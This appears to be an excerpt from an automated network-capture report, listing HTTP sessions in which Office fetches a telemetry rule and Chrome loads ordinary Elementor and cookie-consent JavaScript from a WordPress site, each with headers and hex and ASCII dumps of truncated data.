                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                              x-ms-request-id: 0688ef78-901e-0029-5550-23274a000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180410Z-17fbfdc98bbvwcxrk0yzwg4d580000000660000000005che
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              102192.168.2.649834141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC677OUTGET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-13b11"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e4af1f2d4a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC876INData Raw: 37 64 63 33 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 35 34 5d 2c 7b 33 38 31 3a 28 65 2c 74 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 74 2e 64 65 66 61 75 6c 74 3d 28 65 2c 74 29 3d 3e 7b 74 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 3a 5b 74 5d 3b 66 6f
                                                                                                                                                                                                                              Data Ascii: 7dc3/*! elementor - v3.24.0 - 09-10-2024 */(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];fo
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 65 6e 74 6f 72 2e 73 65 74 74 69 6e 67 73 2e 70 61 67 65 2e 6d 6f 64 65 6c 3b 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2e 67 65 74 41 63 74 69 76 65 43 6f 6e 74 72 6f 6c 73 28 29 2c 28 6e 3d 3e 7b 74 5b 6e 5d 3d 65 2e 61 74 74 72 69 62 75 74 65 73 5b 6e 5d 7d 29 29 7d 65 6c 73 65 20 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 74 74 69 6e 67 73 22 29 7c 7c 7b 7d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 49 74 65 6d 73 28 74 2c 65 29 7d 72 75 6e 45 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 65 6c 65 6d 65 6e 74 73 2e 65 61 63 68 28 28 28 65 2c 74 29 3d 3e 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e
                                                                                                                                                                                                                              Data Ascii: entor.settings.page.model;jQuery.each(e.getActiveControls(),(n=>{t[n]=e.attributes[n]}))}else t=this.$element.data("elementor-settings")||{};return this.getItems(t,e)}runElementsHandlers(){this.elements.$elements.each(((e,t)=>setTimeout((()=>elementorFron
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 64 67 65 74 4e 75 6d 62 65 72 28 29 7d 22 5d 60 7d 2c 61 72 69 61 41 74 74 72 69 62 75 74 65 73 3a 7b 74 69 74 6c 65 53 74 61 74 65 41 74 74 72 69 62 75 74 65 3a 22 61 72 69 61 2d 73 65 6c 65 63 74 65 64 22 2c 61 63 74 69 76 65 54 69 74 6c 65 53 65 6c 65 63 74 6f 72 3a 27 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 22 74 72 75 65 22 5d 27 7d 2c 64 61 74 61 73 65 74 73 3a 7b 74 69 74 6c 65 49 6e 64 65 78 3a 22 64 61 74 61 2d 74 61 62 2d 69 6e 64 65 78 22 7d 2c 6b 65 79 44 69 72 65 63 74 69 6f 6e 3a 7b 41 72 72 6f 77 4c 65 66 74 3a 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 2e 69 73 5f 72 74 6c 3f 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 4e 65 78 74 3a 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 50 72 65 76 69 6f 75 73 2c 41 72 72
                                                                                                                                                                                                                              Data Ascii: dgetNumber()}"]`},ariaAttributes:{titleStateAttribute:"aria-selected",activeTitleSelector:'[aria-selected="true"]'},datasets:{titleIndex:"data-tab-index"},keyDirection:{ArrowLeft:elementorFrontendConfig.is_rtl?this.directionNext:this.directionPrevious,Arr
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 65 6e 74 73 2e 24 69 74 65 6d 54 69 74 6c 65 73 2e 6f 66 66 28 74 68 69 73 2e 67 65 74 54 69 74 6c 65 45 76 65 6e 74 73 28 29 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 66 6f 63 75 73 61 62 6c 65 43 6f 6e 74 61 69 6e 65 72 45 6c 65 6d 65 6e 74 73 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6f 66 66 28 74 68 69 73 2e 67 65 74 43 6f 6e 74 65 6e 74 45 6c 65 6d 65 6e 74 45 76 65 6e 74 73 28 29 29 7d 67 65 74 54 69 74 6c 65 45 76 65 6e 74 73 28 29 7b 72 65 74 75 72 6e 7b 6b 65 79 64 6f 77 6e 3a 74 68 69 73 2e 68 61 6e 64 6c 65 54 69 74 6c 65 4b 65 79 62 6f 61 72 64 4e 61 76 69 67 61 74 69 6f 6e 2e 62 69 6e 64 28 74 68 69 73 29 7d 7d 67 65 74 43 6f 6e 74 65 6e 74 45 6c 65 6d 65 6e 74 45 76 65 6e 74 73 28 29 7b 72 65 74 75 72 6e 7b 6b 65 79 64 6f 77 6e 3a 74 68
                                                                                                                                                                                                                              Data Ascii: ents.$itemTitles.off(this.getTitleEvents()),this.elements.$focusableContainerElements.children().off(this.getContentElementEvents())}getTitleEvents(){return{keydown:this.handleTitleKeyboardNavigation.bind(this)}}getContentElementEvents(){return{keydown:th
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 56 61 6c 75 65 28 65 29 3b 69 3d 6e 3c 74 2b 73 3f 31 3a 30 3d 3d 3d 74 2b 73 3f 6e 3a 74 2b 73 7d 72 65 74 75 72 6e 20 69 7d 63 68 61 6e 67 65 54 69 74 6c 65 46 6f 63 75 73 28 65 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 69 74 65 6d 54 69 74 6c 65 73 2e 66 69 6c 74 65 72 28 74 68 69 73 2e 67 65 74 54 69 74 6c 65 46 69 6c 74 65 72 53 65 6c 65 63 74 6f 72 28 65 29 29 3b 74 68 69 73 2e 73 65 74 54 69 74 6c 65 54 61 62 69 6e 64 65 78 28 65 29 2c 74 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 7d 73 65 74 54 69 74 6c 65 54 61 62 69 6e 64 65 78 28 65 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 69 74 65 6d 54 69 74 6c 65 73 2e 61 74 74 72 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 74 68 69 73 2e 65 6c 65
                                                                                                                                                                                                                              Data Ascii: Value(e);i=n<t+s?1:0===t+s?n:t+s}return i}changeTitleFocus(e){const t=this.elements.$itemTitles.filter(this.getTitleFilterSelector(e));this.setTitleTabindex(e),t.trigger("focus")}setTitleTabindex(e){this.elements.$itemTitles.attr("tabindex","-1");this.ele
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 69 70 65 72 57 72 61 70 70 65 72 29 2c 24 73 77 69 70 65 72 41 72 72 6f 77 73 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 73 77 69 70 65 72 41 72 72 6f 77 29 2c 24 70 61 67 69 6e 61 74 69 6f 6e 57 72 61 70 70 65 72 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 70 61 67 69 6e 61 74 69 6f 6e 57 72 61 70 70 65 72 29 2c 24 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 73 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 29 2c 24 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 57 72 61 70 70 65 72 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 57 72 61 70 70 65 72 29 7d 3b 72 65 74 75 72
                                                                                                                                                                                                                              Data Ascii: iperWrapper),$swiperArrows:this.$element.find(e.swiperArrow),$paginationWrapper:this.$element.find(e.paginationWrapper),$paginationBullets:this.$element.find(e.paginationBullet),$paginationBulletWrapper:this.$element.find(e.paginationBulletWrapper)};retur
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 22 7d 29 2c 6c 26 26 28 72 2e 70 61 67 69 6e 61 74 69 6f 6e 3d 7b 65 6c 3a 60 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 24 7b 74 68 69 73 2e 67 65 74 49 44 28 29 7d 20 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 60 2c 74 79 70 65 3a 65 2e 70 61 67 69 6e 61 74 69 6f 6e 3f 65 2e 70 61 67 69 6e 61 74 69 6f 6e 3a 22 62 75 6c 6c 65 74 73 22 2c 63 6c 69 63 6b 61 62 6c 65 3a 21 30 2c 72 65 6e 64 65 72 42 75 6c 6c 65 74 3a 28 65 2c 74 29 3d 3e 60 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 24 7b 74 7d 22 20 64 61 74 61 2d 62 75 6c 6c 65 74 2d 69 6e 64 65 78 3d 22 24 7b 65 7d 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 24 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 69 31 38 6e
                                                                                                                                                                                                                              Data Ascii: -button-next"}),l&&(r.pagination={el:`.elementor-element-${this.getID()} .swiper-pagination`,type:e.pagination?e.pagination:"bullets",clickable:!0,renderBullet:(e,t)=>`<span class="${t}" data-bullet-index="${e}" aria-label="${elementorFrontend.config.i18n
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 72 63 65 53 6c 69 64 65 72 54 6f 53 68 6f 77 4e 65 78 74 53 6c 69 64 65 57 68 65 6e 4f 6e 4c 61 73 74 28 74 2c 6e 29 2c 74 68 69 73 2e 61 64 64 43 6c 61 73 73 54 6f 53 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 28 22 6f 66 66 73 65 74 2d 72 69 67 68 74 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 65 66 74 22 3a 74 68 69 73 2e 61 64 64 43 6c 61 73 73 54 6f 53 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 28 22 6f 66 66 73 65 74 2d 6c 65 66 74 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 6f 74 68 22 3a 74 68 69 73 2e 66 6f 72 63 65 53 6c 69 64 65 72 54 6f 53 68 6f 77 4e 65 78 74 53 6c 69 64 65 57 68 65 6e 4f 6e 4c 61 73 74 28 74 2c 6e 29 2c 74 68 69 73 2e 61 64 64 43 6c 61 73 73 54 6f 53 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 28 22 6f 66 66 73 65 74 2d 62 6f
                                                                                                                                                                                                                              Data Ascii: rceSliderToShowNextSlideWhenOnLast(t,n),this.addClassToSwiperContainer("offset-right");break;case"left":this.addClassToSwiperContainer("offset-left");break;case"both":this.forceSliderToShowNextSlideWhenOnLast(t,n),this.addClassToSwiperContainer("offset-bo
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 61 67 69 6e 61 74 69 6f 6e 57 72 61 70 70 65 72 2e 6f 66 66 28 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 73 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 2e 6f 66 66 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 3a 66 6f 63 75 73 61 62 6c 65 22 29 2e 6f 66 66 28 29 2c 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 6f 66 66 28 22 72 65 73 69 7a 65 22 29 7d 6f 6e 44 69 72 65 63 74 69 6f 6e 41 72 72 6f 77 4b 65 79 64 6f 77 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 69 73 5f 72 74 6c 2c 6e 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 63 6f 64 65 2c 69 3d 74 3f
                                                                                                                                                                                                                              Data Ascii: s.elements.$paginationWrapper.off(),this.elements.$swiperContainer.off(),this.$element.find(":focusable").off(),elementorFrontend.elements.$window.off("resize")}onDirectionArrowKeydown(e){const t=elementorFrontend.config.is_rtl,n=e.originalEvent.code,i=t?
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 70 61 63 69 6e 67 5f 63 75 73 74 6f 6d 22 2c 22 73 69 7a 65 22 2c 65 29 7c 7c 30 7d 75 70 64 61 74 65 53 70 61 63 65 42 65 74 77 65 65 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 6d 61 74 63 68 28 22 69 6d 61 67 65 5f 73 70 61 63 69 6e 67 5f 63 75 73 74 6f 6d 5f 28 2e 2a 29 22 29 2c 6e 3d 74 3f 74 5b 31 5d 3a 22 64 65 73 6b 74 6f 70 22 2c 69 3d 74 68 69 73 2e 67 65 74 53 70 61 63 65 42 65 74 77 65 65 6e 28 6e 29 3b 22 64 65 73 6b 74 6f 70 22 21 3d 3d 6e 26 26 28 74 68 69 73 2e 73 77 69 70 65 72 2e 70 61 72 61 6d 73 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 72 65 73 70 6f 6e 73 69 76 65 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 5b 6e 5d 2e 76 61 6c 75 65 5d 2e 73 70 61 63
                                                                                                                                                                                                                              Data Ascii: pacing_custom","size",e)||0}updateSpaceBetween(e){const t=e.match("image_spacing_custom_(.*)"),n=t?t[1]:"desktop",i=this.getSpaceBetween(n);"desktop"!==n&&(this.swiper.params.breakpoints[elementorFrontend.config.responsive.activeBreakpoints[n].value].spac


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              103192.168.2.649837141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC513OUTGET /wp-content/uploads/hummingbird-assets/a0e9216368a65f19aaba6582fba739f2.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:47 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f3-d5ae"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e4d815e916-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2c 73 70 62 2d 66 72 6f 6e 74 65 6e 64 2d 6a 73 2d 6d 69 6e 2c 69 6d 61 67 65 73 4c 6f 61 64 65 64 2c 6a 71 75 65 72 79 2d 76 69 65 77 70 6f 72 74 73 2c 6a 71 75 65 72 79 2d 73 6d 61 72 74 72 65 73 69 7a 65 2a 2a 2f 0d 0a 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 3f 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 3a 22 76 69 65 77 65 64 5f 63 6f 6f 6b 69 65 5f 70 6f 6c 69 63 79 22 2c 43 4c 49 5f 50 52 45 46 45 52 45 4e 43 45 5f 43 4f 4f 4b 49 45 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79
                                                                                                                                                                                                                              Data Ascii: 7dc5/**handles:cookie-law-info,spb-frontend-js-min,imagesLoaded,jquery-viewports,jquery-smartresize**/CLI_ACCEPT_COOKIE_NAME="undefined"!=typeof CLI_ACCEPT_COOKIE_NAME?CLI_ACCEPT_COOKIE_NAME:"viewed_cookie_policy",CLI_PREFERENCE_COOKIE="undefined"!=ty
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 26 26 28 69 3d 68 6f 73 74 5f 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 22 2c 22 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 65 2b 22 3d 22 2b 74 2b 6f 2b 6e 2b 22 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 22 2b 69 2b 22 3b 22 29 2c 68 6f 73 74 5f 6e 61 6d 65 3d 68 6f 73 74 5f 6e 61 6d 65 2e 73 75 62 73 74 72 69 6e 67 28 68 6f 73 74 5f 6e 61 6d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 2c 68 6f 73 74 5f 6e 61 6d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 29 2d 31 29 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 65 2b 22 3d 22 2b 74 2b 6f 2b 6e 2b 22 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 22 2b 68 6f 73 74 5f 6e 61 6d 65 2b 22 3b 22 29 7d 2c 72 65 61 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                                                              Data Ascii: &&(i=host_name.replace("www",""),document.cookie=e+"="+t+o+n+"; path=/; domain="+i+";"),host_name=host_name.substring(host_name.lastIndexOf(".",host_name.lastIndexOf(".")-1)),document.cookie=e+"="+t+o+n+"; path=/; domain="+host_name+";")},read:function(e)
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 69 73 2e 73 65 74 74 69 6e 67 73 5f 62 75 74 74 6f 6e 3d 6a 51 75 65 72 79 28 22 2e 63 6c 69 5f 73 65 74 74 69 6e 67 73 5f 62 75 74 74 6f 6e 22 29 2c 74 68 69 73 2e 61 63 63 65 70 74 5f 61 6c 6c 5f 62 75 74 74 6f 6e 3d 6a 51 75 65 72 79 28 22 2e 77 74 2d 63 6c 69 2d 61 63 63 65 70 74 2d 61 6c 6c 2d 62 74 6e 22 29 2c 22 70 6f 70 75 70 22 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 63 6f 6f 6b 69 65 5f 62 61 72 5f 61 73 26 26 28 43 4c 49 5f 43 4f 4f 4b 49 45 42 41 52 5f 41 53 5f 50 4f 50 55 50 3d 21 30 29 2c 74 68 69 73 2e 6d 61 79 42 65 53 65 74 50 72 65 66 65 72 65 6e 63 65 43 6f 6f 6b 69 65 28 29 2c 74 68 69 73 2e 61 64 64 53 74 79 6c 65 41 74 74 72 69 62 75 74 65 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 42 61 72 28 29 2c 74 68 69 73 2e 74 6f 67 67
                                                                                                                                                                                                                              Data Ascii: is.settings_button=jQuery(".cli_settings_button"),this.accept_all_button=jQuery(".wt-cli-accept-all-btn"),"popup"==this.settings.cookie_bar_as&&(CLI_COOKIEBAR_AS_POPUP=!0),this.mayBeSetPreferenceCookie(),this.addStyleAttribute(),this.configBar(),this.togg
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 2e 73 65 74 74 69 6e 67 73 54 61 62 62 65 64 41 63 63 6f 72 64 69 6f 6e 28 29 2c 74 68 69 73 2e 74 6f 67 67 6c 65 55 73 65 72 50 72 65 66 65 72 65 6e 63 65 43 68 65 63 6b 42 6f 78 28 29 2c 74 68 69 73 2e 68 69 64 65 43 6f 6f 6b 69 65 42 61 72 4f 6e 43 6c 6f 73 65 28 29 2c 74 68 69 73 2e 63 6f 6f 6b 69 65 4c 61 77 49 6e 66 6f 52 75 6e 43 61 6c 6c 42 61 63 6b 73 28 29 7d 2c 61 63 63 65 70 74 52 65 6a 65 63 74 43 6f 6f 6b 69 65 73 28 65 2c 74 3d 22 63 75 73 74 6f 6d 22 29 7b 76 61 72 20 69 3d 21 28 21 65 5b 30 5d 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7c 7c 22 23 22 3d 3d 65 2e 61 74 74 72 28 22 68 72 65 66 22 29 29 2c 6f 3d 21 31 2c 6f 3d 22 61 63 63 65 70 74 22 3d 3d 74 3f 28 74 68 69 73 2e 65 6e 61 62 6c 65 41 6c 6c 43 6f 6f 6b 69
                                                                                                                                                                                                                              Data Ascii: .settingsTabbedAccordion(),this.toggleUserPreferenceCheckBox(),this.hideCookieBarOnClose(),this.cookieLawInfoRunCallBacks()},acceptRejectCookies(e,t="custom"){var i=!(!e[0].hasAttribute("href")||"#"==e.attr("href")),o=!1,o="accept"==t?(this.enableAllCooki
